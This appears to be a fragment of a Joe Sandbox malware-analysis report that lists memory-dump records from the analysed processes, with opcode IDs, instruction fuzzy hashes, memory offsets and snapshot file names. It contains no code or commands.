                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eefa64e12ca51b6592e62da9a617fbb9bce87a417772aa5ff60fcfd1116d114
                                                            • Instruction ID: 59a22aa8abe1b8dede23e1eaa23354e4ae70afcfa2db8ad3cd48254f9b5916cb
                                                            • Opcode Fuzzy Hash: 7eefa64e12ca51b6592e62da9a617fbb9bce87a417772aa5ff60fcfd1116d114
                                                            • Instruction Fuzzy Hash: 3B313A22A1D9192FE744B66C648A6F873C5FF883A5F1410BEE40DC31D3CE28AC814699
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79913c51f2aadac22bf334cc2c52ad3565a397df1337e0136cbd38c6ae6ec108
                                                            • Instruction ID: d17fbcfb8686be66f5d18f7d89dc1b03c0348fa89695e939894016ca1270498e
                                                            • Opcode Fuzzy Hash: 79913c51f2aadac22bf334cc2c52ad3565a397df1337e0136cbd38c6ae6ec108
                                                            • Instruction Fuzzy Hash: AA212B20B1C9592FE788F62C948A67977C6EFD8351F5010BDE40EC32D7DE28AC818689
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f376e9afaf940381943fb4811418d0b2796a86d10be72e86c9c6c9d66241ad0a
                                                            • Instruction ID: aca58fd3216116d755d3703122f404120e4260b622e627541395ef085a7720dc
                                                            • Opcode Fuzzy Hash: f376e9afaf940381943fb4811418d0b2796a86d10be72e86c9c6c9d66241ad0a
                                                            • Instruction Fuzzy Hash: 14314F3090D68A9FDB45FB64C8559A97BF0FF16340F0545BAC04AD76A3DB28A845CB50
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8912d4b2d83c57891c67e0a0f4d8d2c6a16c232718a6714d27bca4c112e5bf58
                                                            • Instruction ID: 77a6af1d435fc7ab3ccf410a88582611bc2afb106018133f7e24930bc2dc5a8b
                                                            • Opcode Fuzzy Hash: 8912d4b2d83c57891c67e0a0f4d8d2c6a16c232718a6714d27bca4c112e5bf58
                                                            • Instruction Fuzzy Hash: 7D21F131E0C91A8FE7AAFB4CD4946FC7396EB99390F444279C00EC72C6EF2868419785
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8122c37c87ad55910f314066f6ffe0d3940005cac555d9d83a1f5315f0cf9705
                                                            • Instruction ID: 26812a3bf7edb2ba968c0023e8ccc41de7fbebe4bb55f731a6a71d088b8d2cce
                                                            • Opcode Fuzzy Hash: 8122c37c87ad55910f314066f6ffe0d3940005cac555d9d83a1f5315f0cf9705
                                                            • Instruction Fuzzy Hash: D9218330E1C80A5FEB94FA2894557BC72D1FF98380F4441B5D41ED7692EF286C428F48
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2eaa3f932dcb18f35ae1a1a29582eb7d6c81d8912f7c4fae38df5607dd3be6b4
                                                            • Instruction ID: 09deba2c049c7aad7a6702b6384fd1928a17d1ec88170e8347e9208451442e06
                                                            • Opcode Fuzzy Hash: 2eaa3f932dcb18f35ae1a1a29582eb7d6c81d8912f7c4fae38df5607dd3be6b4
                                                            • Instruction Fuzzy Hash: 7021DB7690DA56AEE702BB68B4452EC7BB0FF81351F1845B6C00C8A5C3CB3C248BCB59
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a42102fcf563e01ff16af547bde31a4ce5bd864e62a6e578bd6b70eeaa42e63
                                                            • Instruction ID: 3290c91321e87760489f09f46f4f19a87fa9def7e10285356ab54ba0642784e8
                                                            • Opcode Fuzzy Hash: 1a42102fcf563e01ff16af547bde31a4ce5bd864e62a6e578bd6b70eeaa42e63
                                                            • Instruction Fuzzy Hash: 0621FA30A189598FEB58EF18C861AA933E2FF58301F1045A9D45ED72D2CB39ED52CF80
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bf1000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c8f2a92b13c01cfebc98fe87fb13b6c8d838f17e23fea9219b05c753703ea18b
                                                            • Instruction ID: ac452ee0a4e117254c44ae60d72008eaeba0b341e90d2f5652c83d86c7070239
                                                            • Opcode Fuzzy Hash: c8f2a92b13c01cfebc98fe87fb13b6c8d838f17e23fea9219b05c753703ea18b
                                                            • Instruction Fuzzy Hash: F111692180FAC51FDB06A7380C2A0647FE0EF17652F4D86FBD589CB5E3DA0D684A8302
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 573749cd73ecb1327921184670ff04e5e8dbec6b398af69f6e22a78a6ea19a10
                                                            • Instruction ID: 9f269bccccf6e709703e7f3a9ac378dcb49c22abcc334acfdf6e632ad0cd418a
                                                            • Opcode Fuzzy Hash: 573749cd73ecb1327921184670ff04e5e8dbec6b398af69f6e22a78a6ea19a10
                                                            • Instruction Fuzzy Hash: 5901E131F1CD0AAFEB94FB28905967C66D1EF94341F0540B5D40ECB6E2DE28AC428B48
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4181046b032fdc4e55cb6dca380cfc04e47174f9494b51dd39846e4381dae444
                                                            • Instruction ID: 103768825935f3b1fb50d4101379bc956b491fdbced55df0a149f26b3e5a292d
                                                            • Opcode Fuzzy Hash: 4181046b032fdc4e55cb6dca380cfc04e47174f9494b51dd39846e4381dae444
                                                            • Instruction Fuzzy Hash: 6E117C70A0C11A8FFB58AA04C850BE8B3E1DB45314F1440B9D41E976D2CE29AE868B48
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71e1e1e04f5953c3208908ca9ce5b3b1928e613fc63ccdf59702afa467f842cc
                                                            • Instruction ID: 34efd812f489d1c6d6502e30d70e4396a4a8513b2676aa4c48181f0f3bbee5ed
                                                            • Opcode Fuzzy Hash: 71e1e1e04f5953c3208908ca9ce5b3b1928e613fc63ccdf59702afa467f842cc
                                                            • Instruction Fuzzy Hash: 0101B132F1801A8FEB94E668E4442FDB2E2FB88394F504131D00DD3281EB3899418B95
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0cb70128f6f2bc5d72909aef2dff14329c5365dfd99bf3517161fde2c66b4af
                                                            • Instruction ID: aaa167e9f5271bd2d67c1d7ba0f742c67e9519afd3f78e558fe743328e03199e
                                                            • Opcode Fuzzy Hash: e0cb70128f6f2bc5d72909aef2dff14329c5365dfd99bf3517161fde2c66b4af
                                                            • Instruction Fuzzy Hash: 09112131A089198FDB54EB04C495BADB7E1FFA8344F5101A9D00EE72A1CF35B9408F85
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction ID: 325f919dbdb8a8c4ae9468161b297d8b89a5ea476b95308e0464eb02fd628163
                                                            • Opcode Fuzzy Hash: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction Fuzzy Hash: 8C013130D1C81A9FEB64FA14DC866F873E1FB94351F1041B9C45ED3A92DF3869868E49
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 051f59136ab7a0365b4a9c74535dd8b2de0984d73b73aced16ffcbe104236607
                                                            • Instruction ID: 87a3822e35427e2d01fe9a2127ee7824bcf0b8c24947d1f1ccb3a5f65265e536
                                                            • Opcode Fuzzy Hash: 051f59136ab7a0365b4a9c74535dd8b2de0984d73b73aced16ffcbe104236607
                                                            • Instruction Fuzzy Hash: 31F0A021B0CBC80FC76AA66958690617FF1DB5B60274A02EFC086CB6A3E959AC858345
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82e3a650ed58862c68e7c0020d8b931fca661d1345cea7f058202efa4b966caf
                                                            • Instruction ID: 3dc523419fc27a78c35c21356ed542850dde7df8e074c2ba2c744d352f7541c1
                                                            • Opcode Fuzzy Hash: 82e3a650ed58862c68e7c0020d8b931fca661d1345cea7f058202efa4b966caf
                                                            • Instruction Fuzzy Hash: 86F03A21E0CD1B8FFB49BA089C406FA32E4EB58390F114175E41AC69C6DF2CEC124A88
                                                            Memory Dump Source
                                                            • Source File: 0000004A.00000002.3036239115.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_74_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction ID: e5c2ef099870320934984292cc68f0ce44319b0d596c3ff06c3d13d0099c91a4
                                                            • Opcode Fuzzy Hash: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5feb18671f0b1f92e8a146f02fc11d9189a800c3bb59502b61d3dec7538dfe5
                                                            • Instruction ID: 4a242836f6350c95464832c26c345b9d4fee02ce308dbd41dcd102e8f2a6da14
                                                            • Opcode Fuzzy Hash: d5feb18671f0b1f92e8a146f02fc11d9189a800c3bb59502b61d3dec7538dfe5
                                                            • Instruction Fuzzy Hash: 9B214920B1C9491FE758FB2C904A6B977C5EF9C391F5000BDE40DC32D3DE28AC818284
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a553af19a32659474f909105bab53136a7561fa9d580f3a5f049ae8aaabda1c2
                                                            • Instruction ID: a72a88708f7bb8472176924e93ca47ac1a02440f90bf5fb329e7953bfadc3257
                                                            • Opcode Fuzzy Hash: a553af19a32659474f909105bab53136a7561fa9d580f3a5f049ae8aaabda1c2
                                                            • Instruction Fuzzy Hash: 4831F77290DA4A9FE702BB6898452FC7BB0FF42351F1445B6D0088B6C3DB3C258AC799
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fe5d5a14311ea3ea52d91e1884b57c9622863d633f92697abb784f73df7d398
                                                            • Instruction ID: f5c1c56b7f5f5c02df604c2ebbb0e0d7eddcd23f3456a3b812ad50aa21f6a745
                                                            • Opcode Fuzzy Hash: 2fe5d5a14311ea3ea52d91e1884b57c9622863d633f92697abb784f73df7d398
                                                            • Instruction Fuzzy Hash: 21215E30E1C90A4FEBA4FA2894557B872D1FF58390F5441B5D45ED3A92EF2CAC428788
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 823c3ee75ffc0c97b1133354810f3cbe8d6ab5cd42da079cf2c8e4b5373a2cda
                                                            • Instruction ID: 98f8fe658e6f979edde002fcb560702822dc04c39989764ff3ac7b04d587e516
                                                            • Opcode Fuzzy Hash: 823c3ee75ffc0c97b1133354810f3cbe8d6ab5cd42da079cf2c8e4b5373a2cda
                                                            • Instruction Fuzzy Hash: 7E01DB21F1CD0A8FEF94FA6C805977826D2FF94341F5540B5D40EC7AA2DE2CAC429748
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a384750628974eb191988cddf03dc382cbc88c49cee6296104278053e558427
                                                            • Instruction ID: e030f445e962b85609d07a535ad381faf8db30c656c846d06ab1be8b86db98be
                                                            • Opcode Fuzzy Hash: 1a384750628974eb191988cddf03dc382cbc88c49cee6296104278053e558427
                                                            • Instruction Fuzzy Hash: 4B11C03190DB889FE702FB7498501AC7BB0FF42351F1545F3C044DB692D638664A8B94
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb66acba34dd9fc0f8f5638a5d8f45a0d6ec303faf5b6cae8289fbb92c24ebbd
                                                            • Instruction ID: 0992459f143079ec7b8443665d4afeb6d35b6dd49b00a4d7eb8f9baecbd8b83e
                                                            • Opcode Fuzzy Hash: eb66acba34dd9fc0f8f5638a5d8f45a0d6ec303faf5b6cae8289fbb92c24ebbd
                                                            • Instruction Fuzzy Hash: 5E11527094C5168FFB58AA04C4907B973A1EF55354F2440F9C41E97BC6CF3DAD858B48
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66594a435fc5febea9e9767775029efbbe6d6bcb0fde19158ad729b9e63d8f76
                                                            • Instruction ID: 5dbd53c138bda7c799bc9e2a3265c6daadf5c5faeaadab51402e021c39b7b6d4
                                                            • Opcode Fuzzy Hash: 66594a435fc5febea9e9767775029efbbe6d6bcb0fde19158ad729b9e63d8f76
                                                            • Instruction Fuzzy Hash: CD112131A489188FDB54EB04C895BAD73E1FF58340F5105A9D00EE72A1CF38A9408B85
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46061fb0bf3affd5dcdd36c4455044fd3704a5aa4af8ea47dd3703ee761bee59
                                                            • Instruction ID: 783cc7d9bb588c662f270bc25283224ef8b6e08abdead51202d4713ede0f65fb
                                                            • Opcode Fuzzy Hash: 46061fb0bf3affd5dcdd36c4455044fd3704a5aa4af8ea47dd3703ee761bee59
                                                            • Instruction Fuzzy Hash: 72019E3190DB889FD702FB7488401AC7FB0FF42310F1541E7D044DB6A2D6389A49C795
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea9f19abbd9a48d09c63fa26ceab97117c4bf80350f51b771b511aafc82336d6
                                                            • Instruction ID: 251291b75501e61604a6d2159364f56bbbf01e3fdb24bc04ef0ee5c8264c9578
                                                            • Opcode Fuzzy Hash: ea9f19abbd9a48d09c63fa26ceab97117c4bf80350f51b771b511aafc82336d6
                                                            • Instruction Fuzzy Hash: 7401783090DB899FE702FBB488501AD7FB0FF06300F1441E2D044DB692DA389A898795
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction ID: d7872e06be3cab5ecde426d43eb42edfd155bf56c1f89187dc34dd42987089e6
                                                            • Opcode Fuzzy Hash: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction Fuzzy Hash: A0016D3091C80A8FEB64FA14CC867F873A0FB44351F1041B9C45E92991DE2C69868A85
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction ID: d080fdfb9804b7a78b7201f07641fd06d019d615538278f5ac39239ca1f3bdd8
                                                            • Opcode Fuzzy Hash: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction Fuzzy Hash: 76F0303091C40A8FEB64F618E8867B83391FB54391F1481B9D85ED3D92DE2C7C868A89
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 219628571ccd9c8580d774db79feb64ebbc2dc4ff318369a6b9ac2c7cab95818
                                                            • Instruction ID: 0d2c741ec7ef374ff08029d41daaeef2fe5b315b8e9c585dbba2a79126abfa1b
                                                            • Opcode Fuzzy Hash: 219628571ccd9c8580d774db79feb64ebbc2dc4ff318369a6b9ac2c7cab95818
                                                            • Instruction Fuzzy Hash: 96E086216598498FCB09BB3C9CA58E5FB60FB47254B8B00EAD04CC75A2E355585DC741
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction ID: abdc657e7a3a855c09846e10842c7eb281929dfd8c16e3f7d8ab439ebaa3eccf
                                                            • Opcode Fuzzy Hash: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction Fuzzy Hash: 64C012305548088FCA48FB28C884D2473A0FB2A304B961094E00DCB2A1D72AECC2CB40
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction ID: b9fe45570297cd260a1800fe7072eca5aba27ab0914f1057f530c47f1bf97404
                                                            • Opcode Fuzzy Hash: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction Fuzzy Hash: D7C08C04D1EC0B0FFA00B96E244A0BCA100BBD42A0FD00032C40C40CC1DE0D20D7015F
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction ID: 17368139f8a1dacb6f786869eb0f9cec53344e27d0d5e273b6cc840f5e988781
                                                            • Opcode Fuzzy Hash: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction Fuzzy Hash: CBC04C3052580D9FCA54F729C98596476A0FB09205BD510D0E409C7561E65A98549745
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61a62bfef5e7436bf552db0b245af061c0568869abdc5f421183c75d69195da4
                                                            • Instruction ID: cd38e90942063cb468ee46e3a94702e9f392426cabd4d74b84cd08520849fd16
                                                            • Opcode Fuzzy Hash: 61a62bfef5e7436bf552db0b245af061c0568869abdc5f421183c75d69195da4
                                                            • Instruction Fuzzy Hash: 71C04C41F198162AE7696614511167E08569F84A45F514474E60EC67CBCF2D5A1312CE
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction ID: 20779cffb7dda3c3fc45b299dea2dc3103412a7452f27568bcfa4a6707d3aa4b
                                                            • Opcode Fuzzy Hash: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction Fuzzy Hash: 4FB01204C6E80F0EE504317E194A07970406B44150FC00070D80C50881D94D10A6025B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: c47b843cf3306b1dbd179aaac9096075a11a82b6c1b5854e25d52482159116e1
                                                            • Instruction ID: 13beca0d0e7572deca652cc6abb1098c7cf1e02a46ace2305948fe54b0ded23b
                                                            • Opcode Fuzzy Hash: c47b843cf3306b1dbd179aaac9096075a11a82b6c1b5854e25d52482159116e1
                                                            • Instruction Fuzzy Hash: A4418347A0FD666AEA113AFD74811FD5B64FF812F6F184677D24C894C38E28609282FD
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848bf0000_9XHFe6y4Dj.jbxd
